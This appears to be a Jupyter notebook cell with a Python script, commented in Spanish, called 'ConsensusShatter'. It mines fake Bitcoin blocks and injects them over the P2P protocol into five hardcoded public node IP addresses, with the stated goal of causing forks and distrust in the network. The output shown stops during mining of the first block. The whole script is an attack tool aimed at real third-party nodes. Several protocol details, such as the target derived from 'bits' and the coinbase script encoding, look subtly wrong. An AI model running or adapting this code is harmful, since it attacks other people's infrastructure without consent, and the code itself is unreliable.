In [ ]:
import hashlib
import struct
import time
import random
import socket
from typing import List, Tuple

class ConsensusShatter:
    """
    Genera e inyecta una cadena de bloques falsa para desestabilizar el consenso.
    Crea una rama alternativa de la blockchain para forzar una reorganización
    o sembrar confusión en nodos que la reciban.
    """

    @staticmethod
    def build_malicious_coinbase_tx(block_height: int) -> bytes:
        """
        Construye una transacción coinbase para un bloque específico.
        Codifica la altura del bloque como un varint (BIP-34 compatible).
        """
        version = struct.pack('<I', 1)
        txid = b'\x00' * 32
        vout = struct.pack('<I', 0xffffffff)

        # --- CORRECCIÓN AQUÍ ---
        # Codificar la altura del bloque como un varint.
        # 820001 en hexadecimal es 0xC8351. Como es mayor a 0xFD, se usa el formato 0xFE + <little-endian 4-byte>.
        if block_height < 0xfd:
            height_script = struct.pack('<B', block_height)
        elif block_height <= 0xffff:
            height_script = b'\xfd' + struct.pack('<H', block_height)
        elif block_height <= 0xffffffff:
            height_script = b'\xfe' + struct.pack('<I', block_height)
        else:
            height_script = b'\xff' + struct.pack('<Q', block_height)
        # --- FIN DE LA CORRECCIÓN ---

        script_sig = height_script + b'CONSENSUS_SHATTER_PAYLOAD'
        sequence = struct.pack('<I', 0xffffffff)
        value = struct.pack('<Q', 50 * 100_000_000)
        script_pubkey = b'\x19' + b'\x76\xa9\x14' + b'\xca\xfe\xba\xbe' * 5 + b'\x88\xac'
        locktime = struct.pack('<I', 0)
        tx = (version + struct.pack('<B', 1) + txid + vout +
              struct.pack('<B', len(script_sig)) + script_sig + sequence +
              struct.pack('<B', 1) + value +
              struct.pack('<B', len(script_pubkey)) + script_pubkey + locktime)
        return tx

    @staticmethod
    def find_nonce(prev_hash: str, merkle_root: bytes, timestamp: int, bits: str) -> Tuple[bytes, int]:
        """Minera un bloque para encontrar un nonce válido."""
        print(f"    [*] Minando bloque sobre {prev_hash[:16]}...")
        target = int(bits, 16)
        nonce = 0
        while True:
            header = (struct.pack('<I', 1) + bytes.fromhex(prev_hash)[::-1] + merkle_root +
                      struct.pack('<I', timestamp) + bytes.fromhex(bits) + struct.pack('<I', nonce))
            hash_result = int.from_bytes(ConsensusShatter.double_sha256(header)[::-1], 'big')
            if hash_result < target:
                return header, nonce
            nonce += 1

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def create_message(command: str, payload: bytes) -> bytes:
        magic = bytes.fromhex('f9beb4d9')
        command_bytes = command.encode('ascii').ljust(12, b'\x00')
        length = struct.pack('<I', len(payload))
        checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
        return magic + command_bytes + length + checksum + payload

    @staticmethod
    def create_version_payload() -> bytes:
        version = struct.pack('<i', 70015)
        services = struct.pack('<Q', 0)
        timestamp = struct.pack('<q', int(time.time()))
        addr_recv_services = struct.pack('<Q', 1)
        addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_recv_port = struct.pack('>H', 8333)
        addr_from_services = struct.pack('<Q', 0)
        addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_from_port = struct.pack('>H', 8333)
        nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
        user_agent_bytes = b'\x12/ConsensusShatter:1/'
        start_height = struct.pack('<i', 820000)
        relay = struct.pack('?', False)
        return (version + services + timestamp + addr_recv_services + addr_recv_ip +
                addr_recv_port + addr_from_services + addr_from_ip + addr_from_port +
                nonce + user_agent_bytes + start_height + relay)

    @staticmethod
    def inject_chain(ip: str, port: int, block_chain_data: List[bytes]):
        """Inyecta una cadena de bloques completa en un nodo."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((ip, port))

            version_payload = ConsensusShatter.create_version_payload()
            version_msg = ConsensusShatter.create_message('version', version_payload)
            s.send(version_msg)
            s.recv(1024)
            verack_msg = ConsensusShatter.create_message('verack', b'')
            s.send(verack_msg)
            s.recv(1024)

            print(f"    📡 Conectado a {ip}:{port}, enviando cadena falsa...")
            for i, block_data in enumerate(block_chain_data):
                block_msg = ConsensusShatter.create_message('block', block_data)
                s.send(block_msg)
                time.sleep(0.1) # Pequeña pausa para no sobrecargar el socket
                print(f"      ☠️ Bloque {i+1} de la cadena falsa enviado.")

            print(f"    💥 Cadena falsa inyectada en {ip}:{port}")
            s.close()

        except Exception as e:
            print(f"    ❌ Error al inyectar en {ip}:{port} - {e}")

    @classmethod
    def execute_shatter(cls, nodes: List[Tuple[str, int]]):
        """Genera y ejecuta el ataque de la cadena falsa."""
        print("=" * 60)
        print(" CONSENSUS SHATTER: INYECCIÓN DE CADENA FALSA")
        print("=" * 60)

        initial_prev_hash = "00000000000000000007878ec04bb2b2e12317804810f4c26033585b3f81ffaa"
        bits = "1d00ffff"
        chain_data = []
        current_prev_hash = initial_prev_hash

        for i in range(3):
            print(f"\n[*] Generando Bloque Falso #{i+1}...")
            coinbase_tx = cls.build_malicious_coinbase_tx(820001 + i)
            tx_hash = cls.double_sha256(coinbase_tx)
            merkle_root = tx_hash

            block_header, nonce = cls.find_nonce(current_prev_hash, merkle_root, int(time.time()), bits)
            print(f"    [+] Nonce: {nonce}")

            full_block = block_header + struct.pack('<B', 1) + coinbase_tx
            chain_data.append(full_block)
            current_prev_hash = cls.double_sha256(block_header)[::-1].hex()

        print("\n[*] Cadena falsa generada. Iniciando inyección en la red...")

        for ip, port in nodes:
            cls.inject_chain(ip, port, chain_data)

        print("\n[+] Ataque de Consensus Shatter completado.")
        print("[+] Los nodos objetivo ahora tienen una rama alternativa de 3 bloques en su memoria.")
        print("[+] Esto puede causar retrasos, forks temporales y desconfianza en el estado de la red.")

if __name__ == "__main__":
    receptive_nodes = [
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333)
    ]

    ConsensusShatter.execute_shatter(receptive_nodes)


 CONSENSUS SHATTER: INYECCIÓN DE CADENA FALSA

[*] Generando Bloque Falso #1...
    [*] Minando bloque sobre 0000000000000000...
